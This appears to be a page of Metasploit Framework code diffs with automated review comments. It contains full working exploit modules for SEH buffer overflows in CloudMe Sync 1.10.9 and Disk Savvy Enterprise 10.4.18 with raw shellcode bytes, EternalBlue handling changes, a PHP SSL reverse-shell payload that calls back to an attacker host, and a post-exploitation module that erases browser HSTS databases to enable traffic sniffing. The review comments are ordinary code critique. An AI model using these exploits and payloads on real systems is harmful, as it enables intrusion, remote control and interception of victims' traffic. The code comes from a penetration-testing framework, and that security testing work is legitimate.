@ -153,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
private: private_key,
private_type: :ssh_key
)
return Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
return Net::SSH::CommandStream.new(ssh)
end
nil


@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
self.sockets.delete(ssh_socket.transport.socket)
return conn


@ -186,6 +186,6 @@ class MetasploitModule < Msf::Exploit::Remote
# Make the SSH connection and execute our commands + payload
print_status("#{rhost}:#{rport} - Sending and executing payload to gain root privileges!")
Net::SSH::CommandStream.new(ssh, build_command, true)
Net::SSH::CommandStream.new(ssh, build_command)
end
end


@ -177,7 +177,7 @@ class MetasploitModule < Msf::Exploit::Remote
message = transport.next_message.type
if message.to_i == 6 #SSH2_MSG_SERVICE_ACCEPT
shell = Net::SSH::CommandStream.new(connection, '/bin/sh', true)
shell = Net::SSH::CommandStream.new(connection)
connection = nil
return shell
end


@ -0,0 +1,67 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'CloudMe Sync v1.10.9',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in CloudMe Sync v1.10.9 client application. This module has been
tested successfully on Windows 7 SP1 x86.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hyp3rlinx', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'References' =>
[
[ 'CVE', '2018-6892'],
[ 'EDB', '44027' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00",
},
'Targets' =>
[
[ 'CloudMe Sync v1.10.9',
{
'Offset' => 2232,
'Ret' => 0x61e7b7f6
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Jan 17 2018',
'DefaultTarget' => 0))
register_options([Opt::RPORT(8888)])
end
def exploit
connect
buffer = make_nops(target['Offset'])
buffer << generate_seh_record(target.ret)
buffer << payload.encoded
sock.put(buffer)
handler
end
end
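Review bot: `'Ret' => 0x61e7b7f6` carries no comment naming the library and version the address is taken from, which is exactly what a maintainer needs when a newer build moves it; a trailing comment of the form `# <library name and version from the advisory>` belongs on that line. The `'Name'` is just the product and version — something like `'CloudMe Sync v1.10.9 Stack Buffer Overflow'` tells the user what the module does. `exploit` also never calls `disconnect` after `sock.put(buffer)`; `handler` followed by `disconnect` is the usual shape.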


@ -0,0 +1,77 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Disk Savvy Enterprise v10.4.18',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in Disk Savvy Enterprise v10.4.18, caused by improper bounds
checking of the request sent to the built-in server. This module
has been tested successfully on Windows 7 SP1 x86.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Teixeira'
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x02\x0a\x0d\xf8",
'Space' => 800
},
'Targets' =>
[
[ 'Disk Savvy Enterprise v10.4.18',
{
'Offset' => 124,
'Ret' => 0x10056d13
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Jan 31 2017',
'DefaultTarget' => 0))
register_options([Opt::RPORT(9124)])
end
def exploit
seh = generate_seh_record(target.ret)
connect
buffer = make_nops(target['Offset'])
buffer << seh
buffer << "\x83\xc4\x7f" * 13 #ADD esp,7fh
buffer << "\x83\xc4\x21" #ADD esp,21h
buffer << "\xff\xe4" #JMP esp
buffer << payload.encoded
buffer << Rex::Text.rand_text_alphanumeric(1)
header = "\x75\x19\xba\xab"
header << "\x03\x00\x00\x00"
header << "\x00\x40\x00\x00"
header << [buffer.length].pack("V")
header << [buffer.length].pack("V")
header << [buffer[-1].ord].pack("V")
packet = header
packet << buffer
sock.put(packet)
handler
end
end
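Review bot: The three fixed header dwords `"\x75\x19\xba\xab"`, `"\x03\x00\x00\x00"` and `"\x00\x40\x00\x00"` and the trailing `[buffer[-1].ord].pack("V")` are undocumented, so a reader cannot tell which is a protocol magic, a message type, a flag or a check value; a one-line comment per field, taken from the original advisory, belongs next to them. As with the CloudMe module on this page, `'Ret' => 0x10056d13` should name the library and version it comes from. `'DisclosureDate' => 'Jan 31 2017'` is a year earlier than the other dates on this page for the same author's v10.4.18 build — worth double-checking against the advisory. `exploit` does not `disconnect` after `sock.put(packet)`.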


@ -60,6 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'WfsDelay' => 5,
},
'Privileged' => true,
'Payload' =>
@ -120,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
# we don't need this sleep, and need to find a way to remove it
# problem is session_count won't increment until stage is complete :\
secs = 0
while !session_created? and secs < 5
while !session_created? and secs < 30
secs += 1
sleep 1
end
@ -139,16 +140,24 @@ class MetasploitModule < Msf::Exploit::Remote
rescue EternalBlueError => e
print_error("#{e.message}")
return false
rescue ::RubySMB::Error::NegotiationFailure
print_error("SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.")
return false
rescue ::RubySMB::Error::UnexpectedStatusCode,
::Errno::ECONNRESET,
::Rex::HostUnreachable,
::Rex::ConnectionTimeout,
::Rex::ConnectionRefused => e
::Rex::ConnectionRefused,
::RubySMB::Error::CommunicationError => e
print_error("#{e.class}: #{e.message}")
report_failure
return false
rescue => error
print_error(error.class.to_s)
print_error(error.message)
print_error(error.backtrace.join("\n"))
return false
ensure
# pass
end
@ -286,6 +295,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
'''
#
# Increase the default delay by five seconds since some kernel-mode
# payloads may not run immediately.
@ -293,7 +303,7 @@ class MetasploitModule < Msf::Exploit::Remote
def wfs_delay
super + 5
end
'''
def smb2_grooms(grooms, payload_hdr_pkt)
grooms.times do |groom_id|
@ -337,7 +347,11 @@ class MetasploitModule < Msf::Exploit::Remote
vprint_status("Sending malformed Trans2 packets")
sock.put(trans2_pkt_nulled)
begin
sock.get_once
rescue EOFError
vprint_error("No response back from SMB echo request. Continuing anyway...")
end
client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00")
end
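Review bot: The new catch-all `rescue => error` branch returns false without calling `report_failure`, while the connection-error branch directly above it (`::RubySMB::Error::CommunicationError => e`) does, so failures that land in the generic handler are presumably not recorded the same way; if that asymmetry is unintended, add `report_failure` before its `return false`. The `ensure` clause holding only `# pass` is a no-op and can be dropped. In the same method `print_error("#{e.message}")` can simply be `print_error(e.message)`. The method containing these rescue clauses begins outside the hunk, as does the method holding the `sock.get_once` / `rescue EOFError` block in the last hunk.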


@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = 132
CachedSize = 253
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
@ -49,6 +49,6 @@ module MetasploitModule
lhost = datastore['LHOST']
ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&"
cmd = "php -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&"
end
end
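Review bot: The rewritten `cmd` string still interpolates `datastore['LHOST']` directly, so the `ver` and `lhost` locals computed on the two lines above it (`lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)`) are never read; either the command should reference `lhost` or those two assignments should be removed as dead code. The `CachedSize` change is consistent with the longer command. The enclosing method's `def` line is outside the hunk.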


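--- /dev/null
+++ b/[PATH NOT SHOWN ON PAGE]
@@ -0,0 +1,130 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Post
+include Msf::Post::File
+include Msf::Post::Windows::UserProfiles
+include Msf::Post::OSX::System
+include Msf::Post::Unix
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Web browsers HSTS entries eraser',
+'Description' => %q{
+This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,
+Google Chrome, Opera, Safari and wget.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths
+],
+'Platform' => %w(linux osx unix win),
+'Arch' => [ARCH_X86,ARCH_X64],
+'References' =>
+[
+[ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ],
+[ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ]
+],
+'SessionTypes' => %w(meterpreter shell)
+))
+register_options([
+OptBool.new('DISCLAIMER',
+[true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false])
+])
+end
+def run
+unless (datastore['DISCLAIMER'] == true)
+print_error("This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning.")
+return
+end
+profiles = user_profiles
+profiles.each do |user_profile|
+account = user_profile['UserName']
+browsers_hsts_db_path = {}
+case session.platform
+when 'windows'
+browsers_hsts_db_path = {
+'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\TransportSecurity",
+'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", #Just path for now
+'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\TransportSecurity"
+}
+when 'unix', 'linux'
+browsers_hsts_db_path = {
+'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity",
+'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", #Just path for now
+'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity",
+'wget' => "#{user_profile['LocalAppData']}/.wget-hsts"
+}
+when 'osx'
+browsers_hsts_db_path = {
+'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/TransportSecurity",
+'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", #Just path for now
+'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/TransportSecurity",
+'Safari' => "#{user_profile['AppData']}/Cookies/HSTS.plist"
+}
+else
+print_error "Platform not recognized: #{session.platform}"
+end
+browsers_hsts_db_path.each_pair do |browser, path|
+if browser == 'Firefox'
+hsts_db_path = []
+if directory?(path)
+files = dir(path)
+files.reject! { |file| %w(. ..).include?(file) }
+files.each do |file_path|
+hsts_db_path.push([path, file_path, 'SiteSecurityServiceState.txt'].join(system_separator)) if file_path.match(/.*\.default/)
+end
+end
+path = hsts_db_path[0]
+end
+if !path.nil? and file?(path)
+print_status "Removing #{browser} HSTS database for #{account}... "
+file_rm(path)
+end
+end
+end
+print_status "HSTS databases removed! Now enjoy your favorite sniffer! ;-)"
+end
+def user_profiles
+user_profiles = []
+case session.platform
+when /unix|linux/
+user_names = dir("/home")
+user_names.reject! { |u| %w(. ..).include?(u) }
+user_names.each do |user_name|
+user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}")
+end
+when /osx/
+user_names = session.shell_command("ls /Users").split
+user_names.reject! { |u| u == 'Shared' }
+user_names.each do |user_name|
+user_profiles.push(
+'UserName' => user_name,
+"AppData" => "/Users/#{user_name}/Library",
+"LocalAppData" => "/Users/#{user_name}/Library/Application Support"
+)
+end
+when /windows/
+user_profiles |= grab_user_profiles
+else
+print_error "Error getting user profile data!"
+end
+user_profiles
+end
+def system_separator
+return session.platform == 'windows' ? '\\' : '/'
+end
+end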
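Review bot: The guard opening `run` spells out `unless (datastore['DISCLAIMER'] == true)`; OptBool values are already normalized to booleans, so `unless datastore['DISCLAIMER']` says the same without the parentheses and the explicit comparison, and `system_separator` likewise needs neither the `return` keyword nor a ternary wrapped in `return`. In the Firefox branch `file_path.match(/.*\.default/)` builds a MatchData that is immediately discarded; `file_path.match?(/\.default/)` is the allocation-free form. `user_profiles` builds hashes keyed `'UserName'`, `'AppData'` and `'LocalAppData'` for unix and osx but delegates to `grab_user_profiles` for windows, while `run` reads those keys on every platform; a comment on the windows branch such as `# grab_user_profiles is expected to supply the same 'UserName'/'AppData'/'LocalAppData' keys that run reads` would make that dependency explicit, since it cannot be confirmed from this file.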


@ -140,11 +140,11 @@ class Plugin::Wmap < Msf::Plugin
end
when '-d'
del_idx = args
if del_idx
if !del_idx.empty?
delete_sites(del_idx.select {|d| d =~ /^[0-9]*$/}.map(&:to_i).uniq)
return
else
print_error("Provide index of site to delete")
print_error("No index provided.")
end
when '-l'
view_sites
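Review bot: The guard `if !del_idx.empty?` only checks that some arguments were given, not that any of them is a usable index: with a non-numeric argument the `select` on the next line yields an empty array, `delete_sites([])` is called, and the `"No index provided."` message is never shown. Filtering first and testing the result closes that gap, e.g. `indices = del_idx.grep(/\A\d+\z/).map(&:to_i).uniq` followed by `if indices.empty? then print_error("No index provided.") else delete_sites(indices) end`. The existing pattern `/^[0-9]*$/` also matches an empty string and anchors per line rather than to the whole string; `\A\d+\z` is the full-string form. The enclosing `case` statement starts outside the hunk.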


@ -1971,6 +1971,28 @@ RSpec.describe 'modules/payloads', :content do
reference_name: 'osx/x64/exec'
end
context 'osx/x64/meterpreter/bind_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/osx/x64/bind_tcp',
'stages/osx/x64/meterpreter'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'osx/x64/meterpreter/bind_tcp'
end
context 'osx/x64/meterpreter/reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/osx/x64/reverse_tcp',
'stages/osx/x64/meterpreter'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'osx/x64/meterpreter/reverse_tcp'
end
context 'osx/x64/meterpreter_reverse_http' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [